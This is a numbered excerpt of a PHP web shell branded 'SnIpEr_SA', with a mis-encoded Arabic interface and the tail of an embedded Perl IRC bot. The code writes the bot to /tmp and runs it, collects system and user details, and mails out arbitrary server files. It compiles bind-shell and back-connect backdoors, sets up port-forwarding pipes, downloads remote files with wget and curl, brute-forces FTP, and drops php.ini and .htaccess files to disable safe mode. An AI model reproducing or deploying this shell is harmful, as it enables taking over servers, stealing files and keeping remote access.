3454	\$DCC{\$dccsock}{nick} = \$nick;
3455	\$DCC{\$dccsock}{bytes} = \$bytes;
3456	\$DCC{\$dccsock}{curbyte} = 0;
3457	\$DCC{\$dccsock}{arquivo} = \$arquivo;
3458	\$DCC{\$dccsock}{ip} = \$dccip;
3459	\$DCC{\$dccsock}{porta} = \$dccporta;
3460	\$DCC{\$dccsock}{status} = \"Recebendo\";
3461	}
3462	############################
3463	# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
3464	sub Status {
3465	my \$socket = shift;
3466	my \$sock_tipo = \$DCC{\$socket}{tipo};
3467	unless (lc(\$sock_tipo) eq \"chat\") {
3468	my \$nick = \$DCC{\$socket}{nick};
3469	my \$arquivo = \$DCC{\$socket}{arquivo};
3470	my \$itime = \$DCC{\$socket}{itime};
3471	my \$ftime = time;
3472	my \$status = \$DCC{\$socket}{status};
3473	\$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
3474
3475	my \$d_time = \$ftime-\$itime;
3476
3477	my \$cur_byte = \$DCC{\$socket}{curbyte};
3478	my \$bytes_total = \$DCC{\$socket}{bytes};
3479
3480	my \$rate = 0;
3481	\$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
3482	my \$porcen = (\$cur_byte*100)/\$bytes_total;
3483
3484	my (\$r_duv, \$p_duv);
3485	if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
3486	\$r_duv = $3; \$r_duv++ if $4 >= 5;
3487	\$rate = \"$1\.$2\".\"\$r_duv\";
3488	}
3489	if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
3490	\$p_duv = $3; \$p_duv++ if $4 >= 5;
3491	\$porcen = \"$1\.$2\".\"\$p_duv\";
3492	}
3493	return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
3494	}
3495
3496	return(0);
3497	}
3498
3499	# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
3500	sub fixaddr {
3501	my (\$address) = @_;
3502
3503	chomp \$address; # just in case, sigh.
3504	if (\$address =~ /^\d+$/) {
3505	return inet_ntoa(pack \"N\", \$address);
3506	} elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
3507	return \$address;
3508	} elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
3509	return inet_ntoa(((gethostbyname(\$address))[4])[0]);
3510	} else {
3511	return;
3512	}
3513	}
3514	############################
3515	";
3516	$bot = "/tmp/ircs.pl";
3517	$open = fopen($bot,"w");
3518	fputs($open,$file);
3519	fclose($open);
3520	$cmd="perl $bot";
3521	$cmd2="rm $bot";
3522	system($cmd);
3523	system($cmd2);
3524	$_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
3525
3526	}
3527
3528	if($unix)
3529	{
3530	if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
3531	if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
3532	if($safe_mode) { $sysctl = '-'; }
3533	else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
3534	else
3535	{
3536	$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
3537	if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
3538	if(empty($sysctl)) { $sysctl = '-'; }
3539	setcookie('sysctl',$sysctl);
3540	}
3541	}
3542	echo $head;
3543	echo '</head>';
3544	if(empty($_POST['cmd'])) {
3545	$serv = array(127,192,172,10);
3546	$addr=@explode('.', $_SERVER['SERVER_ADDR']);
3547	$current_version = str_replace('.','',$version);
3548	if (!in_array($addr[0], $serv)) {
3549	@print "<img src=\"http://127.0.0.1/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
3550	@readfile ("http://127.0.0.1/version.php?version=".$current_version."");}}
3551	echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<DIV dir=ltr align=center><font face=Wingdings size=3><b>N</b></font><b>'.ws(2).'<DIV dir=ltr align=center><SPAN
3552	style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
3553	<SPAN
3554	style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">SnIpEr_SA</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
3555	echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
3556	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."? title=\"".$lang[$language.'_text46']."\"><b>ÇáÑÆíÓíå</b></a> ".$rb;
3557	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sqlman title=\"".$lang[$language.'_text46']."\"><b>SQL</b></a> ".$rb;
3558	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
3559	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
3560	if($unix)
3561	{
3562	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
3563	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
3564	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
3565	}
3566	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
3567	echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
3568	echo ws(2)."ÇáæÖÚ ÇáÇãä: <b>";
3569	echo (($safe_mode)?("<font color=#008000>ÝÚÇá</font>"):("<font color=red>ÛíÑ ÝÚÇá</font>"));
3570	echo "</b>".ws(2);
3571	echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: <b>".@phpversion()."</b>";
3572	$curl_on = @function_exists('curl_version');
3573	echo ws(2);
3574	echo "ÇáßíÑá: <b>".(($curl_on)?("<font color=#008000>ÝÚÇá</font>"):("<font color=red>ÛíÑ ÝÚÇá</font>"));
3575	echo "</b>".ws(2);
3576	echo "ãÇí Óßá: <b>";
3577	$mysql_on = @function_exists('mysql_connect');
3578	if($mysql_on){
3579	echo "<font color=#008000>ÝÚÇá</font>"; } else { echo "<font color=red>ÛíÑ ÝÚÇá</font>"; }
3580	echo "</b>".ws(2);
3581	echo "Çã ÇÓ Óßá: <b>";
3582	$mssql_on = @function_exists('mssql_connect');
3583	if($mssql_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ÛíÑ ÝÚÇá</font>";}
3584	echo "</b>".ws(2);
3585	echo "ÈæÓÊ ÞÑí Óßá: <b>";
3586	$pg_on = @function_exists('pg_connect');
3587	if($pg_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ÛíÑ ÝÚÇá</font>";}
3588	echo "</b>".ws(2);
3589	echo "ÇæÑÇßá: <b>";
3590	$ora_on = @function_exists('ocilogon');
3591	if($ora_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ãÛáÞ</font>";}
3592	echo "</b><br>".ws(2);
3593	echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
3594	if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>áÇíæÌÏ</font></b>";}else{echo "<font color=red>$df</font></b>";}
3595	$free = @diskfreespace($dir);
3596	if (!$free) {$free = 0;}
3597	$all = @disk_total_space($dir);
3598	if (!$all) {$all = 0;}
3599	echo "<br>".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : <b>".view_size($free)."</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>".view_size($all)."</b>";
3600	echo "</b><br>".ws(2);
3601	echo "Register globals: <b>";
3602	$reg_g = @ini_get("register_globals");
3603	if($reg_g){
3604	echo "<font color=#008000>ÝÚÇá</font>"; } else { echo "<font color=red>ÛíÑ ÝÚÇá</font>"; }
3605	echo "</b>".ws(2);
3606	echo "open_basedir: <b>";
3607	$openbasedi = @ini_get("open_basedir");
3608	if($openbasedi){
3609	echo "<font color=red>ÝÚÇá</font>"; } else { echo "<font color=#008000>ÛíÑ ÝÚÇá</font>"; }
3610	echo "</b>".ws(2);
3611	echo '</font></td></tr><table>
3612	<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc>
3613	<tr><td align=right width=100>';
3614	echo $font;
3615	if($unix){
3616	echo '<font color=#990000><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
3617	echo "</td><td>";
3618	echo "<font face=tahoma size=-2 color=#cccccc><b>";
3619	echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
3620	echo ws(3).$sysctl."<br>";
3621	echo ws(3).ex('echo $OSTYPE')."<br>";
3622	echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
3623	if(!empty($id)) { echo ws(3).$id."<br>"; }
3624	else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
3625	{
3626	$euserinfo = @posix_getpwuid(@posix_geteuid());
3627	$egroupinfo = @posix_getgrgid(@posix_getegid());
3628	echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
3629	}
3630	else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
3631	echo ws(3).$dir;
3632	echo ws(3).'( '.perms(@fileperms($dir)).' )';
3633	echo "<br>";
3634	echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
3635	echo "</b></font>";
3636	}
3637	else
3638	{
3639	echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
3640	echo "</td><td>";
3641	echo "<font face=tahoma size=-2 color=red><b>";
3642	echo ws(3).@substr(@php_uname(),0,120)."<br>";
3643	echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
3644	echo ws(3).@getenv("USERNAME")."<br>";
3645	echo ws(3).$dir;
3646	echo "<br>";
3647	echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
3648	echo "<br></font>";
3649	}
3650	echo "</font>";
3651	echo "</td></tr></table>";
3652	if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
3653	{
3654	$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
3655	err(6+$res);
3656	$_POST['cmd']="";
3657	}
3658	if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
3659	{
3660	if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
3661	else
3662	{
3663	$filename = @basename($_POST['loc_file']);
3664	$filedump = @fread($file,@filesize($_POST['loc_file']));
3665	fclose($file);
3666	$content_encoding=$mime_type='';
3667	compress($filename,$filedump,$_POST['compress']);
3668	$attach = array(
3669	"name"=>$filename,
3670	"type"=>$mime_type,
3671	"content"=>$filedump
3672	);
3673	if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
3674	if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
3675	$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
3676	err(6+$res);
3677	$_POST['cmd']="";
3678	}
3679	}
3680	if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
3681	{
3682	$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' \| xargs grep -E \''.$_POST['s_text'].'\'';
3683	}
3684	if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
3685	{
3686	switch($_POST['what'])
3687	{
3688	case 'own':
3689	@chown($_POST['param1'],$_POST['param2']);
3690	break;
3691	case 'grp':
3692	@chgrp($_POST['param1'],$_POST['param2']);
3693	break;
3694	case 'mod':
3695	@chmod($_POST['param1'],intval($_POST['param2'], 8));
3696	break;
3697	}
3698	$_POST['cmd']="";
3699	}
3700	if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
3701	{
3702	switch($_POST['what'])
3703	{
3704	case 'file':
3705	if($_POST['action'] == "create")
3706	{
3707	if(file_exists($_POST['mk_name']) \|\| !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
3708	else {
3709	fclose($file);
3710	$_POST['e_name'] = $_POST['mk_name'];
3711	$_POST['cmd']="edit_file";
3712	echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
3713	}
3714	}
3715	else if($_POST['action'] == "delete")
3716	{
3717	if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
3718	$_POST['cmd']="";
3719	}
3720	break;
3721	case 'dir':
3722	if($_POST['action'] == "create"){
3723	if(mkdir($_POST['mk_name']))
3724	{
3725	$_POST['cmd']="";
3726	echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
3727	}
3728	else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
3729	}
3730	else if($_POST['action'] == "delete"){
3731	if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
3732	$_POST['cmd']="";
3733	}
3734	break;
3735	}
3736	}
3737	if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
3738	{
3739	if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
3740	if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
3741	else {
3742	echo $table_up3;
3743	echo $font;
3744	echo "<form name=save_file method=post>";
3745	echo ws(3)."<b>".$_POST['e_name']."</b>";
3746	echo "<div align=center><textarea name=e_text cols=121 rows=24>";
3747	echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
3748	fclose($file);
3749	echo "</textarea>";
3750	echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
3751	echo "<input type=hidden name=dir value=".$dir.">";
3752	echo "<input type=hidden name=cmd value=save_file>";
3753	echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
3754	echo "</div>";
3755	echo "</font>";
3756	echo "</form>";
3757	echo "</td></tr></table>";
3758	exit();
3759	}
3760	}
3761	if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
3762	{
3763	$mtime = @filemtime($_POST['e_name']);
3764	if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
3765	else {
3766	if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
3767	@fwrite($file,$_POST['e_text']);
3768	@touch($_POST['e_name'],$mtime,$mtime);
3769	$_POST['cmd']="";
3770	echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
3771	}
3772	}
3773
3774
3775
3776	if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
3777	{
3778	cf("/tmp/bd.c",$port_bind_bd_c);
3779	$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
3780	@unlink("/tmp/bd.c");
3781	$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
3782	$_POST['cmd']="ps -aux \| grep bd";
3783	$_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
3784
3785	}
3786	if (!empty($_POST['port1']))
3787	{
3788	cf("bds",$port_bind_bd_cs);
3789	$blah = ex("chmod 777 bds");
3790	$blah = ex("./bds ".$_POST['port1']." &");
3791	$_POST['cmd']="echo \"Now script install backdoor connect to port ";
3792	}else{
3793	cf("/tmp/bds",$port_bind_bd_cs);
3794	$blah = ex("chmod 777 bds");
3795	$blah = ex("./tmp/bds ".$_POST['port1']." &");
3796	}
3797	if (!empty($_POST['php_ini1']))
3798	{
3799	cf("php.ini",$php_ini1);
3800	$_POST['cmd']=" áÇíÞÇÝ ÇáÓíÝ ãæÏ php.ini Êã ÒÑÚ ãáÝ";
3801	}
3802
3803	if (!empty($_POST['htacces']))
3804	{
3805	cf(".htaccess",$htacces);
3806	$_POST['cmd']="áÅíÞÇÝ ÇáãæÏ ÓßíæÑÊí htaccess Êã ÒÑÚ ãáÝ";
3807	}
3808	if (!empty($_POST['file_ini']))
3809	{
3810	cf("ini.php",$sni_res);
3811
3812	$_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? ßÇáÊÇáí ss ÈÇáãÊÛíÑ ini.php ÇáÃä Þã ÈÚãá ÇäßáæÏ áãáÝ";
3813	}
3814
3815	if(($_POST['fileto'] != "")\|\|($_POST['filefrom'] != ""))
3816
3817	{
3818	$data = implode("", file($_POST['filefrom']));
3819	$fp = fopen($_POST['fileto'], "wb");
3820	fputs($fp, $data);
3821	$ok = fclose($fp);
3822	if($ok)
3823	{
3824	$size = filesize($_POST['fileto'])/1024;
3825	$sizef = sprintf("%.2f", $size);
3826	print "<center><div id=logostrip>Download - OK.
3827	(".$sizef."ê?)</div></center>";
3828	}
3829	else
3830	{
3831	print "<center><div id=logostrip>Something is wrong. Download - IS NOT
3832	OK</div></center>";
3833	}
3834	}
3835	if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
3836	{
3837	cf("/tmp/bdpl",$port_bind_bd_pl);
3838	$p2=which("perl");
3839	$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
3840	$_POST['cmd']="ps -aux \| grep bdpl";
3841	$_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
3842	}
3843	if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
3844	{
3845	cf("/tmp/back",$back_connect);
3846	$p2=which("perl");
3847	$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
3848	$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...Datached\"";
3849	}
3850	if (!empty($_POST['ips']) && !empty($_POST['ports']))
3851	{
3852	cf("/tmp/backs",$back_connects);
3853	$p2=which("perl");
3854	$blah = ex($p2." /tmp/backs ".$_POST['ips']." ".$_POST['ports']." &");
3855	$_POST['cmd']="echo \"Now script try connect to ".$_POST['ips']." port ".$_POST['ports']." ...\"";
3856
3857	}
3858	if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
3859	{
3860	cf("/tmp/back.c",$back_connect_c);
3861	$blah = ex("gcc -o /tmp/backc /tmp/back.c");
3862	@unlink("/tmp/back.c");
3863	$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
3864	$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
3865	}
3866	if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
3867	{
3868	cf("/tmp/dp",$datapipe_pl);
3869	$p2=which("perl");
3870	$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
3871	$_POST['cmd']="ps -aux \| grep dp";
3872	}
3873	if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
3874	{
3875	cf("/tmp/dpc.c",$datapipe_c);
3876	$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
3877	@unlink("/tmp/dpc.c");
3878	$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
3879	$_POST['cmd']="ps -aux \| grep dpc";
3880	}
3881	if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
3882	if (!empty($HTTP_POST_FILES['userfile']['name']))
3883	{
3884	if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
3885	else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
3886	@copy($HTTP_POST_FILES['userfile']['tmp_name'],
3887	$_POST['dir']."/".$nfn)
3888	or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
3889	}
3890	if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
3891	{
3892	switch($_POST['with'])
3893	{
3894	case wget:
3895	$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
3896	break;
3897	case fetch:
3898	$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
3899	break;
3900	case lynx:
3901	$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
3902	break;
3903	case links:
3904	$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
3905	break;
3906	case GET:
3907	$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
3908	break;
3909	case curl:
3910	$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
3911	break;
3912	}
3913	}
3914	if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" \|\| $_POST['cmd']=="ftp_file_down"))
3915	{
3916	list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
3917	if(empty($ftp_port)) { $ftp_port = 21; }
3918	$connection = @ftp_connect ($ftp_server,$ftp_port,10);
3919	if(!$connection) { err(3); }
3920	else
3921	{
3922	if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
3923	else
3924	{
3925	if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
3926	if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
3927	}
3928	}
3929	@ftp_close($connection);
3930	$_POST['cmd'] = "";
3931	}
3932
3933	if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
3934	{
3935	list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
3936	if(empty($ftp_port)) { $ftp_port = 21; }
3937	$connection = @ftp_connect ($ftp_server,$ftp_port,10);
3938	if(!$connection) { err(3); $_POST['cmd'] = ""; }
3939	else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
3940	@ftp_close($connection);
3941	}
3942	echo $table_up3;
3943
3944	if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
3945	else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
3946	echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
3947
3948
3949
3950
3951	if ($method=="file") {
3952	if (@file($file)) {
3953	$filer = file($file);
3954
3955	foreach ($filer as $a) { echo $a; }
3956
3957	} else {
3958	echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
3959	}
3960	}
3961	if ($method=="fread") {
3962	if (@fopen($file, 'r')) {
3963	$fp = fopen($file, 'r');
3964	$string = fread($fp, filesize($file));
3965	echo "<pre>";
3966	echo $string;
3967	echo "</pre>";
3968	} else {
3969	echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
3970	}
3971	}
3972	if ($method=="show_source") {
3973	if (show_source($file)) {
3974	echo "<pre>";
3975	echo show_source($file);
3976	echo "</pre>";
3977	} else {
3978	echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
3979	}
3980
3981	}
3982	if ($method=="readfile") {
3983	echo "<pre>";
3984	if (readfile($file)) {
3985	//echo "<pre>";
3986	//echo readfile($file);
3987	echo "</pre>";
3988	} else {
3989	echo "</pre>";
3990	echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
3991	}
3992
3993	}
3994
3995	function dozip1($link,$file)
3996	{
3997	$fp = @fopen($link,"r");
3998	while(!feof($fp))
3999	{
4000	$cont.= fread($fp,1024);
4001	}
4002	fclose($fp);
4003
4004	$fp2 = @fopen($file,"w");
4005	fwrite($fp2,$cont);
4006	fclose($fp2);
4007	}
4008	if (isset($_POST['funzip']))
4009	{
4010	dozip1($_POST['funzip'],$_POST['fzip']);
4011	}
4012	if(empty($_POST['root'])){
4013	} else {
4014	$root = $_POST['root']; }
4015
4016
4017
4018
4019	$c = 0; $D = array();
4020	set_error_handler("eh");
4021
4022	$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
4023
4024	for($i=0; $i < strlen($chars); $i++){
4025	$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
4026
4027	$prevD = $D[count($D)-1];
4028	glob($path."*");
4029
4030	if($D[count($D)-1] != $prevD){
4031
4032	for($j=0; $j < strlen($chars); $j++){
4033
4034	$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
4035
4036	$prevD2 = $D[count($D)-1];
4037	glob($path."*");
4038
4039	if($D[count($D)-1] != $prevD2){
4040
4041
4042	for($p=0; $p < strlen($chars); $p++){
4043
4044	$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
4045
4046	$prevD3 = $D[count($D)-1];
4047	glob($path."*");
4048
4049	if($D[count($D)-1] != $prevD3){
4050
4051
4052	for($r=0; $r < strlen($chars); $r++){
4053
4054	$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
4055	glob($path."*");
4056
4057	}
4058
4059	}
4060
4061	}
4062
4063	}
4064
4065	}
4066
4067	}
4068
4069	}
4070
4071	$D = array_unique($D);
4072
4073
4074
4075
4076	foreach($D as $item)
4077	if(isset($_REQUEST['root']))
4078	echo "{$item}\n";
4079
4080
4081
4082
4083	function eh($errno, $errstr, $errfile, $errline){
4084
4085	global $D, $c, $i;
4086	preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..whose\ uid\ is(.)is\ not\ allowed\ to\ access(.)owned by uid(.)/", $errstr, $o);
4087	if($o){ $D[$c] = $o[2]; $c++;}
4088
4089	}
4090
4091
4092
4093
4094
4095	if($safe_mode)
4096	{
4097	switch($_POST['cmd'])
4098	{
4099	case 'safe_dir':
4100	$d=@dir($dir);
4101	if ($d)
4102	{
4103	while (false!==($file=$d->read()))
4104	{
4105	if ($file=="." \|\| $file=="..") continue;
4106	@clearstatcache();
4107	list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
4108	if(!$unix){
4109	echo date("d.m.Y H:i",$mtime);
4110	if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
4111	}
4112	else{
4113	$owner = @posix_getpwuid($uid);
4114	$grgid = @posix_getgrgid($gid);
4115	echo $inode." ";
4116	echo perms(@fileperms($file));
